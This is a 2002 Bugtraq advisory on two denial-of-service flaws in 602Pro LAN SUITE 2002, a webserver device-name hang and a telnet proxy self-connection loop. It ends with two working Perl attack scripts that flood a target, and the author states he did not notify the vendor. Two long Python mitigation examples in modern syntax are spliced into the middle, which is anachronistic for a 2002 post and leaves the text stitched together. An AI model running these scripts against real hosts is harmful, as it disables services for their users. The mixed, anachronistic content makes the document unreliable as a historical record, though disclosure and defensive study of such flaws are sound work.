Bugtraq mailing list archives

Advisory: Multiple 602Pro LAN SUITE 2002 Denial of Service Attacks


From: Stan Bubrouski <stan () ccs neu edu>
Date: Sun, 04 Aug 2002 12:25:31 -0400

Date: August 3, 2002
Author: Stan Bubrouski
Product: 602Pro LAN SUITE 2002
Version: 2002
Vendor: Software602, Inc.
Summary: Denial of Service attacks in webserver and telnet proxy

Description: There are two denial of service attacks in
602Pro LAN SUITE 2002 for Windows.  The problems are
described below.

Problem 1: Webserver/Webmail windows device name DoS attack

The webserver component of Lan Suite does not filter out
requests for files whose names are Windows device names.  If
you request, say, "/aux.html", the server attempts to open
that device as a file and the thread handling the request
hangs.  The memory and CPU time tied up by that thread are
never reclaimed.  By automating connecting and requesting
that file it is possible to make Lansuite.exe quickly consume
hundreds of megabytes of memory and drive CPU usage to 100%,
achieving a denial of service against Lan Suite.  Even after
the attack is over there is no way to free the system
resources (i.e. memory, CPU) until the process is killed.
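The fix on the server side is to refuse any request whose path contains a Win32 device name before the filesystem is ever touched.  The following is an added example of such a check (it is not the vendor's code, and the function names and the constructed request lines are my own); it applies the classic Win32 naming rules: CON, PRN, AUX and NUL plus COM1-COM9 and LPT1-LPT9, matched case-insensitively on the part of a name before the first dot, with trailing spaces and dots ignored, after percent-decoding and on both "/" and "\" separators.

```python
import re
from urllib.parse import unquote, urlsplit

# Classic Win32 reserved device names; matching is case-insensitive.
RESERVED_DEVICE_NAMES = frozenset(
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{n}" for n in range(1, 10)]
    + [f"LPT{n}" for n in range(1, 10)]
)


def is_reserved_device_name(component: str) -> bool:
    """True if one path component would be opened by Win32 as a device.

    Win32 looks only at the part before the first dot and ignores trailing
    spaces and dots, so "aux.html", "AUX " and "Aux.tar.gz" all name AUX.
    """
    stem = component.split(".", 1)[0].rstrip(" .")
    return stem.upper() in RESERVED_DEVICE_NAMES


def request_path_is_safe(raw_target: str) -> bool:
    """Check every component of an HTTP request target after percent-decoding.

    Returns False as soon as any component names a device.  Decoding first
    matters: "/%61ux.html" becomes "/aux.html" when mapped to a file.
    """
    path = unquote(urlsplit(raw_target).path)
    # Windows accepts "\" as a separator as well, so split on both.
    for component in re.split(r"[\\/]+", path):
        if component and is_reserved_device_name(component):
            return False
    return True


def check_request_line(line: str) -> str:
    """Classify a raw HTTP request line as "allow", "reject" or "malformed".

    Meant to run before the server touches the filesystem, so a rejected
    request is answered with an error instead of opening a device handle.
    """
    parts = line.strip().split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return "malformed"
    return "allow" if request_path_is_safe(parts[1]) else "reject"


# Constructed request lines for the demo; the second is the one the
# advisory's proof of concept sends.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /aux.html HTTP/1.0",
    "GET /docs/%61ux.txt HTTP/1.0",
    "GET /printers\\LPT1 HTTP/1.0",
    "GET /auxiliary.html HTTP/1.0",
    "GET /com10.txt HTTP/1.0",
    "GET /nul. HTTP/1.0",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{check_request_line(req):9s} {req}")
```

The check deliberately looks at every path component, not just the last one, since a directory named "con" is opened by the same device rules as a file named "con.txt".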

Problem 2: The telnet proxy is vulnerable to a DoS attack

The telnet proxy allows connections to localhost, which means
you can connect to the proxy through the proxy itself, without
limit.  For example:

Telnet Gateway ready, enter computer name to connect to.

host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.

host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.

host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.

Automating this process causes the Lansuite.exe process to
consume more and more memory for as long as the connection
remains active; doing this hundreds of times exhausts the
host's resources.
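A telnet gateway that takes a "host[:port]" answer from the user needs two controls the advisory shows are missing: it must refuse destinations that lead back into the proxy host (loopback, the unspecified address, IPv4-mapped loopback, and its own interface addresses, checked against every address a name resolves to), and it must cap the number of simultaneous sessions per client and overall.  The following is an added example of those controls (not the vendor's code); the function names, the static name table standing in for DNS, the client addresses and the proxy's own address 192.0.2.10 are all constructed for the demo.

```python
import ipaddress
import socket
from collections import Counter
from typing import Callable, Dict, Iterable, List, Set, Tuple, Union

Address = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def system_resolve(host: str) -> Set[Address]:
    """Resolve with the system resolver; IP literals pass straight through."""
    try:
        return {ipaddress.ip_address(i[4][0]) for i in socket.getaddrinfo(host, None)}
    except (socket.gaierror, ValueError):
        return set()


def make_static_resolver(table: Dict[str, List[str]]) -> Callable[[str], Set[Address]]:
    """Resolver backed by a fixed name->addresses table (for tests and demos)."""
    def resolve(host: str) -> Set[Address]:
        if host in table:
            return {ipaddress.ip_address(a) for a in table[host]}
        try:
            return {ipaddress.ip_address(host)}   # literal passes through
        except ValueError:
            return set()
    return resolve


def parse_target(target: str, default_port: int = 23) -> Tuple[str, int]:
    """Split the gateway's "host[:port]" answer into (host, port)."""
    host, port = target.strip(), default_port
    if host.startswith("["):                      # [ipv6-literal]:port
        host, _, rest = host[1:].partition("]")
        if rest.startswith(":"):
            port = int(rest[1:])
    elif host.count(":") == 1:                    # name:port or ipv4:port
        host, port_text = host.split(":")
        port = int(port_text)
    return host, port


def destination_allowed(host: str, own_addresses: Iterable[str],
                        resolve: Callable[[str], Set[Address]] = system_resolve) -> bool:
    """Refuse any target that leads back into the proxy host.

    Rejects when *any* resolved address is loopback, unspecified (0.0.0.0, ::),
    an IPv4-mapped loopback (::ffff:127.0.0.1) or one of the proxy's own
    interface addresses.  Unresolvable names fail closed.
    """
    resolved = resolve(host)
    if not resolved:
        return False
    own = {ipaddress.ip_address(a) for a in own_addresses}
    for addr in resolved:
        mapped = getattr(addr, "ipv4_mapped", None)   # only IPv6 has this
        for candidate in ([addr] if mapped is None else [addr, mapped]):
            if candidate.is_loopback or candidate.is_unspecified or candidate in own:
                return False
    return True


class ConnectionLimiter:
    """Cap concurrent proxied sessions per client address and overall.

    A session calls acquire() when it starts and release() when it ends; the
    attack in the advisory needs hundreds of simultaneous sessions, which the
    caps refuse long before memory runs out.
    """
    def __init__(self, per_client: int, total: int):
        self.per_client, self.total = per_client, total
        self.active: Counter = Counter()

    def acquire(self, client_ip: str) -> bool:
        if self.active[client_ip] >= self.per_client or sum(self.active.values()) >= self.total:
            return False
        self.active[client_ip] += 1
        return True

    def release(self, client_ip: str) -> None:
        if self.active[client_ip] > 0:
            self.active[client_ip] -= 1


def gateway_decision(client_ip: str, target: str, own_addresses: Iterable[str],
                     limiter: ConnectionLimiter,
                     resolve: Callable[[str], Set[Address]] = system_resolve) -> str:
    """Decide one "host[:port]" answer: "connect host:port" or a rejection reason."""
    try:
        host, port = parse_target(target)
    except ValueError:
        return "reject: malformed target"
    if not destination_allowed(host, own_addresses, resolve):
        return "reject: destination is the proxy host or unresolvable"
    if not limiter.acquire(client_ip):
        return "reject: connection limit reached"
    return f"connect {host}:{port}"


if __name__ == "__main__":
    # Constructed name table standing in for DNS; 192.0.2.10 is the proxy's address.
    resolver = make_static_resolver({
        "localhost": ["127.0.0.1", "::1"],
        "mail.example": ["10.0.0.5"],
        "split.example": ["203.0.113.7", "127.0.0.1"],
    })
    limiter = ConnectionLimiter(per_client=2, total=50)
    for t in ["mail.example:23", "localhost:23", "split.example",
              "[::ffff:127.0.0.1]:23", "mail.example", "mail.example"]:
        print(f"{t:24s} -> {gateway_decision('198.51.100.7', t, ['192.0.2.10'], limiter, resolver)}")
```

The resolver is injected so the policy can be unit-tested without DNS; in production the default system resolver is used, and the list of own addresses should come from the host's interface enumeration rather than a constant.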
Solution: Because no support e-mail address or phone number is
available which does not require product registration, I did not report
this to the vendor.  There was a bug report form, but I hate the
idiotic format of these web-based forms and the lack of response you
get from them.  To me it's clear if a vendor cared about the quality
of its product they would provide a simple e-mail address you could
report problems to without having to pay for registration.  So in other
words, let them burn, I don't care if they don't.

Attached are two small proof-of-concept exploits for the problems.
#!/usr/bin/perl
#
# lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS
#
# Note: Try very high number of connections and run multiple instances
# of the script for quick results.
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan () ccs neu edu)

use strict;
use warnings;
use Net::Telnet ();

if (!$ARGV[2]) {
        print "Usage $0 <hostname> <port> <connections>\n\n";
        exit();
}

my $host = $ARGV[0];
my $port = $ARGV[1];
my $numc = $ARGV[2];

# One session to the proxy; every time the "host[:port]:" prompt appears
# the answer is localhost:23, so the proxy connects back into itself.
my $t = Net::Telnet->new();
$t->open(Host => $host, Port => $port);

foreach (1 .. $numc) {
        $t->waitfor('/.*host.*/');
        $t->print('localhost:23');
}

#!/usr/bin/perl
#
# lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
#
# Note: Try using a connections setting of 100000+ for obvious results
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan () ccs neu edu)

use strict;
use warnings;
use IO::Socket;

if (!$ARGV[2]) {
        print "Usage $0 <hostname> <port> <connections>\n\n";
        exit();
}

my $host = $ARGV[0];
my $port = $ARGV[1];
my $numc = $ARGV[2];

# Each iteration opens a fresh connection and sends the request line for
# the device-name path; the socket closes when $sock goes out of scope.
foreach (1 .. $numc) {
        my $sock = IO::Socket::INET->new(
                PeerAddr => $host,
                Proto    => "tcp",
                PeerPort => $port,
        );
        # Skip rather than die if the server stopped accepting connections.
        next unless $sock;
        print $sock "GET /aux.html HTTP/1.0\r\n";
}
